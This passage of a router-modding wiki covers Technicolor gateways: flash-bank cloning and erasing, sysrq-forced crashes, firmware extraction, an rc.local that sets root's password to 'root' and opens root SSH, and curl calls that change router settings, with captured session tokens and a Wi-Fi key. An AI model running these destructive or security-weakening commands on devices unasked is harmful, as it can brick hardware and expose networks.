  "$(grep bank_2 /proc/mtd | cut -d' ' -f2)" ] && {
    # When booted from bank_1, clone it into bank_2 and verify the clone
    [ "$(cat /proc/banktable/booted)" = "bank_1" ] && {
        mtd -e bank_2 write /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 && \
        mtd verify /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 || \
        { echo Clone verification failed, retry; exit; }
    }
    # Move the overlay of the booted bank to bank_2 and mark bank_1 as the active bank
    cp -rf /overlay/$(cat /proc/banktable/booted) /tmp/bank_overlay_backup
    rm -rf /overlay/*
    cp -rf /tmp/bank_overlay_backup /overlay/bank_2
    echo bank_1 > /proc/banktable/active
    sync
    # Erase bank_1 and force a hard reboot through sysrq
    mtd erase bank_1;
    echo c > /proc/sysrq-trigger;
}
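Added example, not from this wiki: the two preconditions the bank plan script checks first (exactly two bank_ partitions, and bank_1 and bank_2 of equal size) as sh functions that read a /proc/mtd style file, so they can be tried against a constructed table before anything is run on a real device. The partition numbers and sizes in the demo are made up.

```shell
#!/bin/sh
# Added example (not from this wiki): the precondition checks of the bank-clone script
# above, as functions that read a /proc/mtd style file so they can be tried on a
# constructed table instead of the live router. /proc/mtd lines look like
#   mtd3: 01e00000 00020000 "bank_1"
# (device, size in hex, erase size in hex, quoted name).

# mtd_dev MTD_FILE NAME: device node name (e.g. mtd3) for partition NAME.
mtd_dev() {
    grep "\"$2\"" "$1" | cut -d: -f1
}

# mtd_size MTD_FILE NAME: size of partition NAME in bytes (decimal); fails if absent.
mtd_size() {
    hex=$(grep "\"$2\"" "$1" | cut -d' ' -f2)
    [ -n "$hex" ] || return 1
    echo $(( 0x$hex ))
}

# banks_match MTD_FILE: success only when exactly two bank_* partitions exist and
# bank_1 and bank_2 have the same size, the condition the script requires before cloning.
banks_match() {
    [ "$(grep -c 'bank_' "$1")" = 2 ] || return 1
    s1=$(mtd_size "$1" bank_1) || return 1
    s2=$(mtd_size "$1" bank_2) || return 1
    [ "$s1" = "$s2" ]
}

# Demo on a constructed /proc/mtd table (numbers and sizes are made up).
demo() {
    t=$(mktemp)
    printf '%s\n' 'dev:    size   erasesize  name' \
        'mtd0: 00040000 00020000 "cfe"' \
        'mtd1: 01e00000 00020000 "bank_1"' \
        'mtd2: 01e00000 00020000 "bank_2"' \
        'mtd3: 00400000 00020000 "rootfs_data"' > "$t"
    echo "bank_1 is /dev/$(mtd_dev "$t" bank_1), $(mtd_size "$t" bank_1) bytes"
    banks_match "$t" && echo "banks match, cloning is safe" || echo "banks differ, do not clone"
}

demo
```

On the router, `banks_match /proc/mtd` answers the same question the first two lines of the script ask, and quoting the name in the grep avoids matching a partition whose name merely contains bank_1.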
  • Checking RBI firmware signature
signature_checker -b /tmp/firmware_to_check.rbi [-k /tmp/other_board_to_check.osik]

Or run the router's own signature_checker on a PC, from an extracted firmware, under qemu-arm-static:

binwalk -e any_decrypted_firmware.bin
mv firmware_to_check.rbi pubkey_to_check.osik _any_decrypted_firmware.bin.extracted/squashfs-root/tmp/
cd _any_decrypted_firmware.bin.extracted/squashfs-root
cp $(which qemu-arm-static) .
sudo chroot . ./qemu-arm-static /usr/bin/signature_checker -b /tmp/firmware_to_check.rbi -k /tmp/pubkey_to_check.osik

Extract Firmware and RBI file

Read more here

  • Extract firmware file:
cat "15516436o1361004closed.rbi" \
    |(bli_parser \
        && echo "Please wait..." \
        && (bli_unseal|dd bs=4 skip=1 seek=1 of="15516436o1361004closed.bin"))
magic_value: BLI2
fim: 23
fia: PE
prodid: 0
varid: 0
version: 0.0.0.0
data_offset: 369
data_size: 24068698
timestamp: 0x276B8E76
boardname: VDNT-O
prodname: Technicolor TG799vn v2
varname: TG799vn v2
tagparserversion: 200
flashaddress: 0xC2000000
Please wait...
  • Configure dropbear for our upgrade so we can connect to shell via openssh after upgrade
mkdir -p /overlay/$(cat /proc/banktable/booted)/etc
chmod 755 /overlay/$(cat /proc/banktable/booted) /overlay/$(cat /proc/banktable/booted)/etc
echo -e "echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
rm /overlay/\$(cat /proc/banktable/booted)/etc/rc.local
source /rom/etc/rc.local
" > /overlay/$(cat /proc/banktable/booted)/etc/rc.local
chmod +x /overlay/$(cat /proc/banktable/booted)/etc/rc.local
sync
  • Dropbear must be configured as below, otherwise we won't get access (required):
uci -q delete dropbear.afg
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
  • Now it's time to write the new firmware and upgrade the router

Erase and write the new firmware into the booted bank, then trigger a kernel crash via sysrq to force a hard reboot:

mtd -e $(cat /proc/banktable/booted) write "1720405o1901068closed.bin" $(cat /proc/banktable/booted)
Unlocking bank_1 ...
Erasing bank_1 ...

Writing from 1720405o1901068closed.bin to bank_1 ..
echo c > /proc/sysrq-trigger
  • Don't rush, create a backup of course when you're working with this kind of stuff:
tar -C /overlay -cz -f /tmp/backup-$(date -I).tar.gz $(cat /proc/banktable/booted)
  • Manually create a tarball with your custom configuration for your current setup:
tar -C /overlay -cz -f /tmp/overlay-files-backup-$(date -I).tar.gz bank_1 bank_2

If you prefer, you can rely on sysupgrade to achieve a similar result for the booted bank only.

Create and Save the tarball in /tmp/

sysupgrade -i -b /tmp/sysupgrade-backup-$(date -I).tar.gz
  • Restore a backup tarball with sysupgrade -f
sysupgrade -f /tmp/sysupgrade-backup-*.tar.gz

Enable/Disable power LEDs on device

  • Turn on power LED
echo 1 > /sys/class/leds/power:green/brightness
  • Turn off the red power LED
echo 0 > /sys/class/leds/power:red/brightness

If the web UI is not available for some reason you can use curl to set, edit and remove settings instead.

This is very interesting since we are allowed to turn interfaces off and on, export and import config files, get the bank size and a lot more. The only thing I didn't have any luck with YET is the ?action=upgradefw part.

  • Here are a few examples

  • Wireless settings

curl 'http://192.168.1.1/modals/wireless-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'admin_state=1&standard=bgn&requested_channel=auto&channelwidth20=20MHz&channelwidth40=20MHz&channelwidth80=20MHz&sgi=1&cdd=1&stbc=1&ap_enabled=1&ssid=Telia-1DAA3B&ap_broadcast_ssid=1&security=wpa2-psk&wpa_psk=D4104BC782&wep_key=899BC4B768&radius_authent_ip=&radius_authent_port=1812&radius_authent_secret=899BC4B768&radius_account_ip=&radius_account_port=1813&radius_account_secret=&wps_enabled=0&wps_device_pin_code=&radius_authent_state=&radius_account_state=&acl_mode=unlock&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed
  • Set IPv6 enable
curl 'http://192.168.1.1/modals/ethernet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'localdevIP=192.168.1.1&localdevmask=255.255.255.0&localIPv6=1&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=1h&dnsServer=192.168.1.1&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed

Export/Import configuration

Import backup configuration and reboot device

curl 'http://192.168.1.1/modals/gateway-modal.lp?action=import_config' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Content-Length: 142986' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFPdhvt6tT2AARW9e' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --compressed \
  --insecure

Export your current configuration that is in use

curl 'http://192.168.1.1/modals/gateway-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --data-raw 'action=export_config&CSRFtoken=86b6d3a28f3cb5b743662f8032d97731fed9a42028b42ab71aa15718c09b2236' \
  --compressed \
  --insecure

Upgrade Firmware via Curl

  1. import firmware
  2. getbanksize
  3. upgradefw
  4. upgradefwstatus

curl 'http://192.168.1.1/modals/gateway-modal.lp?action=getbanksize' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefw' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Content-Length: 21973672' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLmy6iZzHQwMAbWUk' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefwstatus' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure

Set VOIP on/off

curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=voip&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

If you don't have an IPTV setup from your ISP, there is no reason to keep this running; it just uses resources for nothing.

curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=iptv&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Set WAN connection on/off

curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=wan&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Disable the ISP's interface (mgmt) so they won't be able to connect without your knowledge

curl 'http://192.168.1.1/modals/internet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'interface=mgmt&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Set DHCP on/off

curl 'http://192.168.1.3/modals/ethernet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.3' \
  -H 'Referer: http://192.168.1.3/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=85a4f11d0eeae627f417a9815d0735716738c75e956c68ae19e4d64c46ce216d;' \
  --data-raw 'localdevIP=192.168.1.3&localdevmask=255.255.255.0&dhcpv6=disabled&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=24h&action=SAVE&fromModal=YES&CSRFtoken=681d0f3680a6867f379468b7861460f3d5ef0e947805d0112c756bac7f2f787c' \
  --compressed \
  --insecure

Set DHCP Guest Mode > off

curl 'http://192.168.1.3/modals/ethernet-modal.lp?intf=guest' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.3' \
  -H 'Referer: http://192.168.1.3/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: YPF8827340282Jdskjhfiw_928937459182JAX666=185.213.154.234; sessionID=85a4f11d0eeae627f417a9815d0735716738c75e956c68ae19e4d64c46ce216d; undefined=undefined; superuser=undefined; role=superuser=undefined' \
  --data-raw 'localdevIP=192.168.168.1&localdevmask=255.255.255.0&dhcpv6=disabled&dhcpv4State=disabled&dhcpStart=64&dhcpLimit=180&leaseTime=1h&action=SAVE&fromModal=YES&CSRFtoken=681d0f3680a6867f379468b7861460f3d5ef0e947805d0112c756bac7f2f787c' \
  --compressed \
  --insecure

Device Settings

curl 'http://192.168.1.1/modals/device-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'priority=1&tableid=devices&stateid=&action=TABLE-MODIFY&index=1&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Telephone Settings

curl 'http://192.168.1.1/modals/mmpbx-global-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'mmpbx_enabled=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Pair/Unpair Headset

curl 'http://192.168.1.1/modals/mmpbx-dect-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'action=pairing_handset&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

List stored phonebook contacts

curl 'http://192.168.1.1/modals/mmpbx-contacts-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --compressed \
  --insecure

curl 'http://192.168.1.1/modals/mmpbx-log-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --compressed \
  --insecure

Clear and Delete all call logs

curl 'http://192.168.1.1/modals/mmpbx-log-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'action=SAVE&operation=RESET&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Set assistance mode to: on/off

curl 'http://192.168.1.1/modals/assistance-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'ra_enabled=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure

Set DMZ enable

Notice: for VBNT-7 the card is found under 'bridge-modal.lp' instead of 'dmz-modal.lp'.

curl 'http://192.168.1.3/modals/dmz-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.3' \
  -H 'Referer: http://192.168.1.3/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=bb647ad9f1eff0e465f392973c7d9b32b7facea8634952251b5b3e447ff1aab0' \
  --data-raw 'DMZ_enabled=0&DMZ_flag=1&action=SAVE&fromModal=YES&CSRFtoken=34019b4b0bc60bdac7275e1a3b4a980f33343395b498472bb3b4af076e3d915b' \
  --compressed \
  --insecure

Minitr064d

  • Create a user for minitr064d
computeHA1 -u <username> -p <password> -r
Self test passed - HA1 computation reliable
Self test passed - authentication check reliable

Computing hash for <username>:minitr064d:<password>
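How the HA1 that computeHA1 prints is built and then used, as an added Python example (not code from this README or from minitr064d). It assumes minitr064d speaks standard HTTP Digest authentication (RFC 2617) with the realm `minitr064d`, which is what the `<username>:minitr064d:<password>` line above suggests.

```python
"""Added example (not from the README or from minitr064d): how the HA1 value
that computeHA1 prints is derived, and how a TR-064 server checks an HTTP
Digest response against a stored HA1 instead of a clear-text password.
Assumption: minitr064d uses standard HTTP Digest auth (RFC 2617) with the
realm "minitr064d", as the "<username>:minitr064d:<password>" line suggests."""
import hashlib
import hmac

REALM = "minitr064d"  # realm shown in the computeHA1 output above


def md5_hex(data: str) -> str:
    # Digest auth is defined over MD5; the hash is fixed by the protocol.
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def compute_ha1(username: str, password: str, realm: str = REALM) -> str:
    """HA1 = MD5(username:realm:password).

    The server only needs this value, never the password. The flip side is
    that HA1 is password-equivalent for this realm: whoever reads it from the
    daemon's config can authenticate as the user, so protect that file."""
    return md5_hex(f"{username}:{realm}:{password}")


def digest_response(ha1: str, method: str, uri: str, nonce: str,
                    nc: str, cnonce: str, qop: str = "auth") -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2), with HA2 = MD5(method:uri)."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def verify_digest(stored_ha1: str, method: str, uri: str, nonce: str,
                  nc: str, cnonce: str, response: str, qop: str = "auth") -> bool:
    """Server-side check, compared in constant time."""
    expected = digest_response(stored_ha1, method, uri, nonce, nc, cnonce, qop)
    return hmac.compare_digest(expected, response)


def self_test() -> bool:
    """Counterpart of the tool's 'Self test passed' line, using the published
    example vector from RFC 2617 section 3.5."""
    ha1 = compute_ha1("Mufasa", "Circle Of Life", realm="testrealm@host.com")
    response = digest_response(ha1, "GET", "/dir/index.html",
                               "dcd98b7102dd2f0e8b11d0f600bfb0c093",
                               "00000001", "0a4f113b")
    return response == "6629fae49393a05397450978507c4ef1"


if __name__ == "__main__":
    print("Self test passed" if self_test() else "Self test FAILED")
    # Placeholders, as in the README; substitute the real user and password.
    print("HA1 =", compute_ha1("<username>", "<password>"))
```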

Clash (the internet provider connects to clash when they remote-control the device via shell)

  • Add a new user with clash:

clash newsrpuser -u <wuseman> -p <password>

 uci set web_back.usr_wuseman.srp_salt='D0124225'
 uci add web_back.default.users='usr_wuseman'
 uci add web_back.uidefault.defaultuser='wuseman'
 uci add web_back.usr_wuseman=user
 uci set web_back.usr_wuseman.name='wuseman'
 uci set web_back.usr_wuseman.role='wuseman'
 uci set web_back.usr_wuseman.gak_id='1'
cat << "EOF"  >> /etc/config/web
config user 'usr_wuseman'
option name 'wuseman'
option password_reminder '0'
option srp_verifier '<srp_verifier>'
option srp_salt 'D0124225'
EOF
  • A few examples of commands you can try in the clash environment
root>get InternetGatewayDevice.Services.X_000E50_RemoteAccess.
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.IPIntf [string] = InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.WANIPConnection.4
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.User [string] = assist
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Port [unsignedInt] = 60443
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPassword [boolean] = 1
